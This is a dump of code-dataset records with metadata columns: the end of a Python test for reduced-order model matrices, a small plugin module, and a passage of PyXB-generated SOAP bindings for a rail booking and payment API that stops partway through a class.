assert np.allclose(rom.A_, Vr.T @ A @ Vr)
H_ = Vr.T @ H @ np.kron(Vr, Vr)
for _ in range(10):
x_ = np.random.random(r)
x2_ = np.kron(x_, x_)
assert np.allclose(rom.H_ @ opinf.utils.kron2c(x_), H_ @ x2_)
| 34.520833
| 79
| 0.577147
| 832
| 4,971
| 3.328125
| 0.13101
| 0.052004
| 0.104009
| 0.096064
| 0.824847
| 0.811123
| 0.798122
| 0.798122
| 0.798122
| 0.798122
| 0
| 0.021395
| 0.238383
| 4,971
| 143
| 80
| 34.762238
| 0.709984
| 0.116073
| 0
| 0.718182
| 0
| 0
| 0.024971
| 0
| 0
| 0
| 0
| 0
| 0.290909
| 1
| 0.090909
| false
| 0
| 0.036364
| 0.072727
| 0.2
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
a2cf9821dfc6b495baa1b2569e0ad255b12b258f
| 98
|
py
|
Python
|
cloeepy_boto/__init__.py
|
cloeeai/CloeePy-Boto
|
c9ba48d12fde1a224577794bce3fdca6a6d3fb96
|
[
"MIT"
] | null | null | null |
cloeepy_boto/__init__.py
|
cloeeai/CloeePy-Boto
|
c9ba48d12fde1a224577794bce3fdca6a6d3fb96
|
[
"MIT"
] | null | null | null |
cloeepy_boto/__init__.py
|
cloeeai/CloeePy-Boto
|
c9ba48d12fde1a224577794bce3fdca6a6d3fb96
|
[
"MIT"
] | null | null | null |
from cloeepy_boto.cloeepy_boto import CloeePyBoto
def get_plugin_class():
return CloeePyBoto
| 19.6
| 49
| 0.826531
| 13
| 98
| 5.923077
| 0.769231
| 0.285714
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.132653
| 98
| 4
| 50
| 24.5
| 0.905882
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 8
|
a2d67fc2fc0e99ede0cea4de4b5cb88e8cc0f7c8
| 171,922
|
py
|
Python
|
silver/silverraw/silvercore.py
|
IshavanBaar/railaid
|
d8d1c4f834018b954d70ccb00a626961617d5453
|
[
"MIT"
] | 5
|
2015-11-17T12:47:20.000Z
|
2017-06-15T14:10:29.000Z
|
silver/silverraw/silvercore.py
|
HackTrain/silver
|
339165d1b2cc6988567ce94313a66c5c0b0b95c4
|
[
"MIT"
] | null | null | null |
silver/silverraw/silvercore.py
|
HackTrain/silver
|
339165d1b2cc6988567ce94313a66c5c0b0b95c4
|
[
"MIT"
] | null | null | null |
# ./silvercore.py
# -*- coding: utf-8 -*-
# PyXB bindings for NM:124ab58ff634848548cf6d9d1320f856ff23519e
# Generated 2015-11-14 16:58:02.798568 by PyXB version 1.2.4 using Python 2.7.9.final.0
# Namespace http://schemas.xmlsoap.org/soap/envelope/
from __future__ import unicode_literals
import pyxb
import pyxb.binding
import pyxb.binding.saxer
import io
import pyxb.utils.utility
import pyxb.utils.domutils
import sys
import pyxb.utils.six as _six
# Unique identifier for bindings created at the same time
_GenerationUID = pyxb.utils.utility.UniqueIdentifier('urn:uuid:dd5dc02e-8af0-11e5-954c-7831c1d0cf70')
# Version of PyXB used to generate the bindings
_PyXBVersion = '1.2.4'
# Generated bindings are not compatible across PyXB versions
if pyxb.__version__ != _PyXBVersion:
raise pyxb.PyXBVersionError(_PyXBVersion)
# Import bindings for namespaces imported into schema
import silvershop as _ImportedBinding_silvershop
import pyxb.binding.datatypes
import silverbook as _ImportedBinding_silverbook
# NOTE: All namespace declarations are reserved within the binding
Namespace = pyxb.namespace.NamespaceForURI('http://schemas.xmlsoap.org/soap/envelope/', create_if_missing=True)
Namespace.configureCategories(['typeBinding', 'elementBinding'])
def CreateFromDocument (xml_text, default_namespace=None, location_base=None):
"""Parse the given XML and use the document element to create a
Python instance.
@param xml_text An XML document. This should be data (Python 2
str or Python 3 bytes), or a text (Python 2 unicode or Python 3
str) in the L{pyxb._InputEncoding} encoding.
@keyword default_namespace The L{pyxb.Namespace} instance to use as the
default namespace where there is no default namespace in scope.
If unspecified or C{None}, the namespace of the module containing
this function will be used.
@keyword location_base: An object to be recorded as the base of all
L{pyxb.utils.utility.Location} instances associated with events and
objects handled by the parser. You might pass the URI from which
the document was obtained.
"""
if pyxb.XMLStyle_saxer != pyxb._XMLStyle:
dom = pyxb.utils.domutils.StringToDOM(xml_text)
return CreateFromDOM(dom.documentElement, default_namespace=default_namespace)
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
saxer = pyxb.binding.saxer.make_parser(fallback_namespace=default_namespace, location_base=location_base)
handler = saxer.getContentHandler()
xmld = xml_text
if isinstance(xmld, _six.text_type):
xmld = xmld.encode(pyxb._InputEncoding)
saxer.parse(io.BytesIO(xmld))
instance = handler.rootObject()
return instance
def CreateFromDOM (node, default_namespace=None):
"""Create a Python instance from the given DOM node.
The node tag must correspond to an element declaration in this module.
@deprecated: Forcing use of DOM interface is unnecessary; use L{CreateFromDocument}."""
if default_namespace is None:
default_namespace = Namespace.fallbackNamespace()
return pyxb.binding.basis.element.AnyCreateFromDOM(node, default_namespace)
# Atomic simple type: [anonymous]
class STD_ANON (pyxb.binding.datatypes.boolean):
"""An atomic simple type."""
_ExpandedName = None
_XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 87, 4)
_Documentation = None
STD_ANON._CF_pattern = pyxb.binding.facets.CF_pattern()
STD_ANON._CF_pattern.addPattern(pattern='0|1')
STD_ANON._InitializeFacetMap(STD_ANON._CF_pattern)
# List simple type: {http://schemas.xmlsoap.org/soap/envelope/}encodingStyle
# superclasses pyxb.binding.datatypes.anySimpleType
class encodingStyle (pyxb.binding.basis.STD_list):
"""
'encodingStyle' indicates any canonicalization conventions followed in the contents of the containing element. For example, the value 'http://schemas.xmlsoap.org/soap/encoding/' indicates the pattern described in SOAP specification
"""
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'encodingStyle')
_XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 94, 0)
_Documentation = "\n 'encodingStyle' indicates any canonicalization conventions followed in the contents of the containing element. For example, the value 'http://schemas.xmlsoap.org/soap/encoding/' indicates the pattern described in SOAP specification\n "
_ItemType = pyxb.binding.datatypes.anyURI
encodingStyle._InitializeFacetMap()
Namespace.addCategoryObject('typeBinding', 'encodingStyle', encodingStyle)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Envelope with content type ELEMENT_ONLY
class Envelope_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://schemas.xmlsoap.org/soap/envelope/}Envelope with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Envelope')
_XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 15, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element {http://schemas.xmlsoap.org/soap/envelope/}Header uses Python identifier Header
__Header = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Header'), 'Header', '__httpschemas_xmlsoap_orgsoapenvelope_Envelope__httpschemas_xmlsoap_orgsoapenvelopeHeader', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 23, 4), )
Header = property(__Header.value, __Header.set, None, None)
# Element {http://schemas.xmlsoap.org/soap/envelope/}Body uses Python identifier Body
__Body = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(Namespace, 'Body'), 'Body', '__httpschemas_xmlsoap_orgsoapenvelope_Envelope__httpschemas_xmlsoap_orgsoapenvelopeBody', False, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 30, 4), )
Body = property(__Body.value, __Body.set, None, None)
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/'))
_HasWildcardElement = True
_ElementMap.update({
__Header.name() : __Header,
__Body.name() : __Body
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'Envelope', Envelope_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Header with content type ELEMENT_ONLY
class Header_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://schemas.xmlsoap.org/soap/envelope/}Header with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Header')
_XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 24, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
_AttributeWildcard = pyxb.binding.content.Wildcard(process_contents=pyxb.binding.content.Wildcard.PC_lax, namespace_constraint=(pyxb.binding.content.Wildcard.NC_not, 'http://schemas.xmlsoap.org/soap/envelope/'))
_HasWildcardElement = True
_ElementMap.update({
})
_AttributeMap.update({
})
Namespace.addCategoryObject('typeBinding', 'Header', Header_)
# Complex type {http://schemas.xmlsoap.org/soap/envelope/}Body with content type ELEMENT_ONLY
class Body_ (pyxb.binding.basis.complexTypeDefinition):
"""Complex type {http://schemas.xmlsoap.org/soap/envelope/}Body with content type ELEMENT_ONLY"""
_TypeDefinition = None
_ContentTypeTag = pyxb.binding.basis.complexTypeDefinition._CT_ELEMENT_ONLY
_Abstract = False
_ExpandedName = pyxb.namespace.ExpandedName(Namespace, 'Body')
_XSDLocation = pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 31, 4)
_ElementMap = {}
_AttributeMap = {}
# Base type is pyxb.binding.datatypes.anyType
# Element pointToPointShoppingRequest uses Python identifier pointToPointShoppingRequest
__pointToPointShoppingRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingRequest'), 'pointToPointShoppingRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__pointToPointShoppingRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 33, 12), )
pointToPointShoppingRequest = property(__pointToPointShoppingRequest.value, __pointToPointShoppingRequest.set, None, None)
# Element pointToPointShoppingResponse uses Python identifier pointToPointShoppingResponse
__pointToPointShoppingResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'pointToPointShoppingResponse'), 'pointToPointShoppingResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__pointToPointShoppingResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 34, 12), )
pointToPointShoppingResponse = property(__pointToPointShoppingResponse.value, __pointToPointShoppingResponse.set, None, None)
# Element travelPassShoppingRequest uses Python identifier travelPassShoppingRequest
__travelPassShoppingRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'travelPassShoppingRequest'), 'travelPassShoppingRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__travelPassShoppingRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 35, 12), )
travelPassShoppingRequest = property(__travelPassShoppingRequest.value, __travelPassShoppingRequest.set, None, None)
# Element travelPassShoppingResponse uses Python identifier travelPassShoppingResponse
__travelPassShoppingResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'travelPassShoppingResponse'), 'travelPassShoppingResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__travelPassShoppingResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 36, 12), )
travelPassShoppingResponse = property(__travelPassShoppingResponse.value, __travelPassShoppingResponse.set, None, None)
# Element scheduleSearchRequest uses Python identifier scheduleSearchRequest
__scheduleSearchRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'scheduleSearchRequest'), 'scheduleSearchRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__scheduleSearchRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 37, 12), )
scheduleSearchRequest = property(__scheduleSearchRequest.value, __scheduleSearchRequest.set, None, None)
# Element scheduleSearchResponse uses Python identifier scheduleSearchResponse
__scheduleSearchResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'scheduleSearchResponse'), 'scheduleSearchResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__scheduleSearchResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 38, 12), )
scheduleSearchResponse = property(__scheduleSearchResponse.value, __scheduleSearchResponse.set, None, None)
# Element addPaymentRequest uses Python identifier addPaymentRequest
__addPaymentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'addPaymentRequest'), 'addPaymentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__addPaymentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 39, 12), )
addPaymentRequest = property(__addPaymentRequest.value, __addPaymentRequest.set, None, None)
# Element addPaymentResponse uses Python identifier addPaymentResponse
__addPaymentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'addPaymentResponse'), 'addPaymentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__addPaymentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 40, 12), )
addPaymentResponse = property(__addPaymentResponse.value, __addPaymentResponse.set, None, None)
# Element authenticatePayerRequest uses Python identifier authenticatePayerRequest
__authenticatePayerRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'authenticatePayerRequest'), 'authenticatePayerRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__authenticatePayerRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 41, 12), )
authenticatePayerRequest = property(__authenticatePayerRequest.value, __authenticatePayerRequest.set, None, None)
# Element authenticatePayerResponse uses Python identifier authenticatePayerResponse
__authenticatePayerResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'authenticatePayerResponse'), 'authenticatePayerResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__authenticatePayerResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 42, 12), )
authenticatePayerResponse = property(__authenticatePayerResponse.value, __authenticatePayerResponse.set, None, None)
# Element cancelBookingRecordRequest uses Python identifier cancelBookingRecordRequest
__cancelBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordRequest'), 'cancelBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__cancelBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 43, 12), )
cancelBookingRecordRequest = property(__cancelBookingRecordRequest.value, __cancelBookingRecordRequest.set, None, None)
# Element cancelBookingRecordResponse uses Python identifier cancelBookingRecordResponse
__cancelBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'cancelBookingRecordResponse'), 'cancelBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__cancelBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 44, 12), )
cancelBookingRecordResponse = property(__cancelBookingRecordResponse.value, __cancelBookingRecordResponse.set, None, None)
# Element claimValueDocumentRequest uses Python identifier claimValueDocumentRequest
__claimValueDocumentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'claimValueDocumentRequest'), 'claimValueDocumentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__claimValueDocumentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 45, 12), )
claimValueDocumentRequest = property(__claimValueDocumentRequest.value, __claimValueDocumentRequest.set, None, None)
# Element claimValueDocumentResponse uses Python identifier claimValueDocumentResponse
__claimValueDocumentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'claimValueDocumentResponse'), 'claimValueDocumentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__claimValueDocumentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 46, 12), )
claimValueDocumentResponse = property(__claimValueDocumentResponse.value, __claimValueDocumentResponse.set, None, None)
# Element confirmBookingRecordRequest uses Python identifier confirmBookingRecordRequest
__confirmBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordRequest'), 'confirmBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__confirmBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 47, 12), )
confirmBookingRecordRequest = property(__confirmBookingRecordRequest.value, __confirmBookingRecordRequest.set, None, None)
# Element confirmBookingRecordResponse uses Python identifier confirmBookingRecordResponse
__confirmBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'confirmBookingRecordResponse'), 'confirmBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__confirmBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 48, 12), )
confirmBookingRecordResponse = property(__confirmBookingRecordResponse.value, __confirmBookingRecordResponse.set, None, None)
# Element createBookingRecordRequest uses Python identifier createBookingRecordRequest
__createBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'createBookingRecordRequest'), 'createBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__createBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 49, 12), )
createBookingRecordRequest = property(__createBookingRecordRequest.value, __createBookingRecordRequest.set, None, None)
# Element createBookingRecordResponse uses Python identifier createBookingRecordResponse
__createBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'createBookingRecordResponse'), 'createBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__createBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 50, 12), )
createBookingRecordResponse = property(__createBookingRecordResponse.value, __createBookingRecordResponse.set, None, None)
# Element recordFinancialTransactionRequest uses Python identifier recordFinancialTransactionRequest
__recordFinancialTransactionRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionRequest'), 'recordFinancialTransactionRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__recordFinancialTransactionRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 51, 12), )
recordFinancialTransactionRequest = property(__recordFinancialTransactionRequest.value, __recordFinancialTransactionRequest.set, None, None)
# Element recordFinancialTransactionResponse uses Python identifier recordFinancialTransactionResponse
__recordFinancialTransactionResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'recordFinancialTransactionResponse'), 'recordFinancialTransactionResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__recordFinancialTransactionResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 52, 12), )
recordFinancialTransactionResponse = property(__recordFinancialTransactionResponse.value, __recordFinancialTransactionResponse.set, None, None)
# Element redeliverValueDocumentRequest uses Python identifier redeliverValueDocumentRequest
__redeliverValueDocumentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentRequest'), 'redeliverValueDocumentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__redeliverValueDocumentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 53, 12), )
redeliverValueDocumentRequest = property(__redeliverValueDocumentRequest.value, __redeliverValueDocumentRequest.set, None, None)
# Element redeliverValueDocumentResponse uses Python identifier redeliverValueDocumentResponse
__redeliverValueDocumentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'redeliverValueDocumentResponse'), 'redeliverValueDocumentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__redeliverValueDocumentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 54, 12), )
redeliverValueDocumentResponse = property(__redeliverValueDocumentResponse.value, __redeliverValueDocumentResponse.set, None, None)
# Element retrieveBookingRecordRequest uses Python identifier retrieveBookingRecordRequest
__retrieveBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordRequest'), 'retrieveBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 55, 12), )
retrieveBookingRecordRequest = property(__retrieveBookingRecordRequest.value, __retrieveBookingRecordRequest.set, None, None)
# Element retrieveBookingRecordResponse uses Python identifier retrieveBookingRecordResponse
__retrieveBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'retrieveBookingRecordResponse'), 'retrieveBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__retrieveBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 56, 12), )
retrieveBookingRecordResponse = property(__retrieveBookingRecordResponse.value, __retrieveBookingRecordResponse.set, None, None)
# Element returnValueDocumentRequest uses Python identifier returnValueDocumentRequest
__returnValueDocumentRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'returnValueDocumentRequest'), 'returnValueDocumentRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__returnValueDocumentRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 57, 12), )
returnValueDocumentRequest = property(__returnValueDocumentRequest.value, __returnValueDocumentRequest.set, None, None)
# Element returnValueDocumentResponse uses Python identifier returnValueDocumentResponse
__returnValueDocumentResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'returnValueDocumentResponse'), 'returnValueDocumentResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__returnValueDocumentResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 58, 12), )
returnValueDocumentResponse = property(__returnValueDocumentResponse.value, __returnValueDocumentResponse.set, None, None)
# Element searchBookingRecordsRequest uses Python identifier searchBookingRecordsRequest
__searchBookingRecordsRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsRequest'), 'searchBookingRecordsRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__searchBookingRecordsRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 59, 12), )
searchBookingRecordsRequest = property(__searchBookingRecordsRequest.value, __searchBookingRecordsRequest.set, None, None)
# Element searchBookingRecordsResponse uses Python identifier searchBookingRecordsResponse
__searchBookingRecordsResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'searchBookingRecordsResponse'), 'searchBookingRecordsResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__searchBookingRecordsResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 60, 12), )
searchBookingRecordsResponse = property(__searchBookingRecordsResponse.value, __searchBookingRecordsResponse.set, None, None)
# Element updateBookingRecordRequest uses Python identifier updateBookingRecordRequest
__updateBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'updateBookingRecordRequest'), 'updateBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__updateBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 61, 12), )
updateBookingRecordRequest = property(__updateBookingRecordRequest.value, __updateBookingRecordRequest.set, None, None)
# Element updateBookingRecordResponse uses Python identifier updateBookingRecordResponse
__updateBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'updateBookingRecordResponse'), 'updateBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__updateBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 62, 12), )
updateBookingRecordResponse = property(__updateBookingRecordResponse.value, __updateBookingRecordResponse.set, None, None)
# Element refundBookingRecordRequest uses Python identifier refundBookingRecordRequest
__refundBookingRecordRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'refundBookingRecordRequest'), 'refundBookingRecordRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__refundBookingRecordRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 63, 12), )
refundBookingRecordRequest = property(__refundBookingRecordRequest.value, __refundBookingRecordRequest.set, None, None)
# Element refundBookingRecordResponse uses Python identifier refundBookingRecordResponse
__refundBookingRecordResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'refundBookingRecordResponse'), 'refundBookingRecordResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__refundBookingRecordResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 64, 12), )
refundBookingRecordResponse = property(__refundBookingRecordResponse.value, __refundBookingRecordResponse.set, None, None)
# Element validateBookingRecordInformationRequest uses Python identifier validateBookingRecordInformationRequest
__validateBookingRecordInformationRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationRequest'), 'validateBookingRecordInformationRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__validateBookingRecordInformationRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 65, 12), )
validateBookingRecordInformationRequest = property(__validateBookingRecordInformationRequest.value, __validateBookingRecordInformationRequest.set, None, None)
# Element validateBookingRecordInformationResponse uses Python identifier validateBookingRecordInformationResponse
__validateBookingRecordInformationResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'validateBookingRecordInformationResponse'), 'validateBookingRecordInformationResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__validateBookingRecordInformationResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 66, 12), )
validateBookingRecordInformationResponse = property(__validateBookingRecordInformationResponse.value, __validateBookingRecordInformationResponse.set, None, None)
# Element generatePaymentTokenRequest uses Python identifier generatePaymentTokenRequest
__generatePaymentTokenRequest = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenRequest'), 'generatePaymentTokenRequest', '__httpschemas_xmlsoap_orgsoapenvelope_Body__generatePaymentTokenRequest', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 67, 12), )
generatePaymentTokenRequest = property(__generatePaymentTokenRequest.value, __generatePaymentTokenRequest.set, None, None)
# Element generatePaymentTokenResponse uses Python identifier generatePaymentTokenResponse
__generatePaymentTokenResponse = pyxb.binding.content.ElementDeclaration(pyxb.namespace.ExpandedName(None, 'generatePaymentTokenResponse'), 'generatePaymentTokenResponse', '__httpschemas_xmlsoap_orgsoapenvelope_Body__generatePaymentTokenResponse', True, pyxb.utils.utility.Location('/Users/bloomberglondonrd1/IdeaProjects/silvercore/xsd/all.xsd', 68, 12), )
